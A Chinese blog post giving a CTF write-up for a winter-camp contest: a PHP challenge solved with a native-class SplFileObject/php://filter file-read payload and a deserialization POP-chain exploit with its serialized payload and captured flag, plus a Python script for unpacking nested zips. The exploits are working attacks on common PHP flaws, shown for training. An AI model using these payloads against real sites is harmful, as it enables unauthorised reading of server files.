第二届山石CTF冬令营结营赛wp

J_0k3r

于 2023-01-18 22:57:30 发布

阅读量391

点赞数 3

分类专栏： ctf 文章标签：网络安全

本文链接：https://blog.csdn.net/qq_73734019/article/details/128697360

版权

ctf 专栏收录该内容

18 篇文章 4 订阅

订阅专栏

web

Primitive php

题目源码：

<?php
highlight_file(__FILE__);
//hint.php
foreach ($_GET as $value) {
    if(preg_match("/flag/",$value)){
        die("不可以看flag啦，阿sir");
    }

}
$a = new $_GET['class1']($_GET['a']);$b = new $_GET['class2']($_GET['b']);
if ($a !== $b and md5($a)===md5($b))
{
    echo new $_GET['class3']($_GET['c']);
}

原生类绕过：参考：php中关于一些$a($b)_Msaerati的博客-CSDN博客_php new $a($b)

尝试rce读取flag无果，构造伪协议读取hint.php

filter流伪协议读到源码

payload：

?class2=Exception&b=<script>alert('1')</script>&class1=Exception&a=<script>alert('1')</script>&class3=SplFileObject&c=php://filter/convert.base64-encode/resource=hint.php

解base64得到hint.php

<?php
echo "no hint";
class blue
{
    public $b1;
    public $b2;

    function eval() {
        echo new $this->b1($this->b2);
    }

    public function __invoke()
    {
        $this->b1->blue();
    }
}

class red
{
    public $r1;

    public function __destruct()
    {
        echo $this->r1 . '0xff0000';
    }

    public function execute()
    {
        ($this->r1)();
    }

    public function __call($a, $b)
    {
        echo $this->r1->getFlag();
    }

}

class white
{
    public $w;

    public function __toString()
    {
        $this->w->execute();
        return 'hello';
    }
}
class color
{
    public $c1;

    public function execute()
    {
        ($this->c1)();
    }

    public function getFlag()
    {
        echo file_get_contents($this->c1);
    }

}

unserialize($_POST['cmd']);

反序列化构造payload

参考：

[DASCTF 2022]三月赛 web 复现_das三月赛web_Snakin_ya的博客-CSDN博客

构造伪协议读取flagphp://filter/convert.base64-encode/resource=flag.php

exp：

<?php
class blue
{
    public $b1;
    public $b2;

    public function __construct($b1)
    {
        $this->b1 = $b1;
    }
}

class red
{
    public $r1;

    public function __construct($r1)
    {
        $this->r1 = $r1;
    }
}

class white
{
    public $w;

    public function __construct($w)
    {
        $this->w = $w;
    }
}
class color
{
    public $c1;

    public function __construct($c1)
    {
        $this->c1 = $c1;
    }

}
$f = new color("php://filter/convert.base64-encode/resource=flag.php");  
$e = new red($f);
$d = new blue($e);
$c = new color($d);
$b = new white($c);
$a = new red($b);
echo (urlencode(serialize($a)));

unserialize($_POST['cmd']); //post传参cmd

payload：

cmd=O%3A3%3A%22red%22%3A1%3A%7Bs%3A2%3A%22r1%22%3BO%3A5%3A%22white%22%3A1%3A%7Bs%3A1%3A%22w%22%3BO%3A5%3A%22color%22%3A1%3A%7Bs%3A2%3A%22c1%22%3BO%3A4%3A%22blue%22%3A2%3A%7Bs%3A2%3A%22b1%22%3BO%3A3%3A%22red%22%3A1%3A%7Bs%3A2%3A%22r1%22%3BO%3A5%3A%22color%22%3A1%3A%7Bs%3A2%3A%22c1%22%3Bs%3A52%3A%22php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7Ds%3A2%3A%22b2%22%3BN%3B%7D%7D%7D%7D

HSNCTF{537C532E-408B-FDCD-3E49-58E6FB578579}

misc

extract

用工具cloakify

kali：

打开保存的文件

改后缀zip

zip套娃，文件名递减1

脚本实现

import zipfile

count = 2331
while count>0:
    path = 'f'+ str(count) + '.zip'
    folder_abs = '.'

    zip_file = zipfile.ZipFile(path)
    zip_list = zip_file.namelist()

    for f in zip_list:
        zip_file.extract(f, folder_abs)
     
    zip_file.close()
    count -= 1